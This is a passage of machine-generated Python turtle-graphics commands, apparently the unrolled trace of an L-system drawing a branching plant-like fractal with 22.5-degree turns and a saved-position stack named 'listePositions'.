pd(), fd(8.0) ;
pu(), setposition((109.95,251.88)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((83.86,234.45), 45.0), ((109.95,251.88), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((109.95,251.88)), setheading(45.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((83.86,234.45), 45.0), ((116.08,266.67), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((116.08,266.67)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((83.86,234.45), 45.0), ((116.08,266.67), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((116.08,266.67)), setheading(67.5) ;
pu(), setposition((83.86,234.45)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((83.86,234.45), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((83.86,234.45), 67.5), ((83.86,250.45), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((83.86,250.45)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((83.86,234.45), 67.5), ((83.86,250.45), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((83.86,250.45)), setheading(90.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((83.86,234.45), 67.5), ((89.98,265.23), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((89.98,265.23)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((83.86,234.45), 67.5), ((89.98,265.23), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((89.98,265.23)), setheading(67.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((83.86,234.45), 67.5), ((101.29,276.54), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((101.29,276.54)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((83.86,234.45), 67.5), ((101.29,276.54), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((101.29,276.54)), setheading(45.0) ;
pu(), setposition((83.86,234.45)), setheading(67.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((83.86,250.45), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((83.86,250.45)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((83.86,250.45), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((83.86,250.45)), setheading(90.0) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((83.86,266.45), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((83.86,266.45)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((83.86,266.45), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((83.86,266.45)), setheading(90.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((83.86,266.45), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((83.86,266.45), 67.5), ((95.17,277.76), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((95.17,277.76)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((83.86,266.45), 67.5), ((95.17,277.76), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((95.17,277.76)), setheading(45.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((83.86,266.45), 67.5), ((101.29,292.54), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((101.29,292.54)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((83.86,266.45), 67.5), ((101.29,292.54), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((101.29,292.54)), setheading(67.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((83.86,266.45), 67.5), ((101.29,308.54), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((101.29,308.54)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((83.86,266.45), 67.5), ((101.29,308.54), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((101.29,308.54)), setheading(90.0) ;
pu(), setposition((83.86,266.45)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((83.86,266.45), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((83.86,266.45), 90.0), ((77.73,281.23), 90.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((77.73,281.23)), setheading(90.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((83.86,266.45), 90.0), ((77.73,281.23), 112.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((77.73,281.23)), setheading(112.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((83.86,266.45), 90.0), ((77.73,297.23), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((77.73,297.23)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((83.86,266.45), 90.0), ((77.73,297.23), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((77.73,297.23)), setheading(90.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((83.86,266.45), 90.0), ((83.86,312.01), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((83.86,312.01)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 67.5), ((83.86,266.45), 90.0), ((83.86,312.01), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((83.86,312.01)), setheading(67.5) ;
pu(), setposition((83.86,266.45)), setheading(90.0) ;
pu(), setposition((48.98,182.26)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((42.86,197.04), 90.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((42.86,197.04)), setheading(90.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((42.86,197.04), 112.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((42.86,197.04)), setheading(112.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((36.74,211.82), 90.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((36.74,211.82)), setheading(90.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((36.74,211.82), 112.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((36.74,211.82)), setheading(112.5) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((36.74,211.82), 90.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((36.74,211.82), 90.0), ((42.86,226.60), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((42.86,226.60)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((36.74,211.82), 90.0), ((42.86,226.60), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((42.86,226.60)), setheading(67.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((36.74,211.82), 90.0), ((42.86,242.60), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((42.86,242.60)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((36.74,211.82), 90.0), ((42.86,242.60), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((42.86,242.60)), setheading(90.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((36.74,211.82), 90.0), ((36.74,257.38), 90.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((36.74,257.38)), setheading(90.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((36.74,211.82), 90.0), ((36.74,257.38), 112.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((36.74,257.38)), setheading(112.5) ;
pu(), setposition((36.74,211.82)), setheading(90.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((36.74,211.82), 112.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((36.74,211.82), 112.5), ((25.42,223.13), 112.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((25.42,223.13)), setheading(112.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((36.74,211.82), 112.5), ((25.42,223.13), 135.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((25.42,223.13)), setheading(135.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((36.74,211.82), 112.5), ((19.30,237.92), 90.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((19.30,237.92)), setheading(90.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((36.74,211.82), 112.5), ((19.30,237.92), 112.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((19.30,237.92)), setheading(112.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((36.74,211.82), 112.5), ((19.30,253.92), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((19.30,253.92)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((36.74,211.82), 112.5), ((19.30,253.92), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((19.30,253.92)), setheading(90.0) ;
pu(), setposition((36.74,211.82)), setheading(112.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((36.74,227.82), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((36.74,227.82)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((36.74,227.82), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((36.74,227.82)), setheading(90.0) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((36.74,243.82), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((36.74,243.82)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((36.74,243.82), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((36.74,243.82)), setheading(90.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((36.74,243.82), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((36.74,243.82), 67.5), ((48.05,255.13), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((48.05,255.13)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((36.74,243.82), 67.5), ((48.05,255.13), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((48.05,255.13)), setheading(45.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((36.74,243.82), 67.5), ((54.17,269.92), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((54.17,269.92)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((36.74,243.82), 67.5), ((54.17,269.92), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((54.17,269.92)), setheading(67.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((36.74,243.82), 67.5), ((54.17,285.92), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((54.17,285.92)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((36.74,243.82), 67.5), ((54.17,285.92), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((54.17,285.92)), setheading(90.0) ;
pu(), setposition((36.74,243.82)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((36.74,243.82), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((36.74,243.82), 90.0), ((30.61,258.60), 90.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((30.61,258.60)), setheading(90.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((36.74,243.82), 90.0), ((30.61,258.60), 112.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((30.61,258.60)), setheading(112.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((36.74,243.82), 90.0), ((30.61,274.60), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((30.61,274.60)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((36.74,243.82), 90.0), ((30.61,274.60), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((30.61,274.60)), setheading(90.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((36.74,243.82), 90.0), ((36.74,289.38), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((36.74,289.38)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((36.74,243.82), 90.0), ((36.74,289.38), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((36.74,289.38)), setheading(67.5) ;
pu(), setposition((36.74,243.82)), setheading(90.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((42.86,258.60), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((42.86,258.60)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((42.86,258.60), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((42.86,258.60)), setheading(67.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((48.98,273.38), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((48.98,273.38)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((48.98,273.38), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((48.98,273.38)), setheading(67.5) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((48.98,273.38), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((48.98,273.38), 45.0), ((63.77,279.51), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((63.77,279.51)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((48.98,273.38), 45.0), ((63.77,279.51), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((63.77,279.51)), setheading(22.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((48.98,273.38), 45.0), ((75.08,290.82), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((75.08,290.82)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((48.98,273.38), 45.0), ((75.08,290.82), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((75.08,290.82)), setheading(45.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((48.98,273.38), 45.0), ((81.20,305.60), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((81.20,305.60)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((48.98,273.38), 45.0), ((81.20,305.60), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((81.20,305.60)), setheading(67.5) ;
pu(), setposition((48.98,273.38)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((48.98,273.38), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((48.98,273.38), 67.5), ((48.98,289.38), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((48.98,289.38)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((48.98,273.38), 67.5), ((48.98,289.38), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((48.98,289.38)), setheading(90.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((48.98,273.38), 67.5), ((55.11,304.17), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((55.11,304.17)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((48.98,273.38), 67.5), ((55.11,304.17), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((55.11,304.17)), setheading(67.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((48.98,273.38), 67.5), ((66.42,315.48), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((66.42,315.48)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((48.98,182.26), 90.0), ((48.98,273.38), 67.5), ((66.42,315.48), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((66.42,315.48)), setheading(45.0) ;
pu(), setposition((48.98,273.38)), setheading(67.5) ;
pu(), setposition((48.98,182.26)), setheading(90.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 67.5), ((55.11,197.04), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
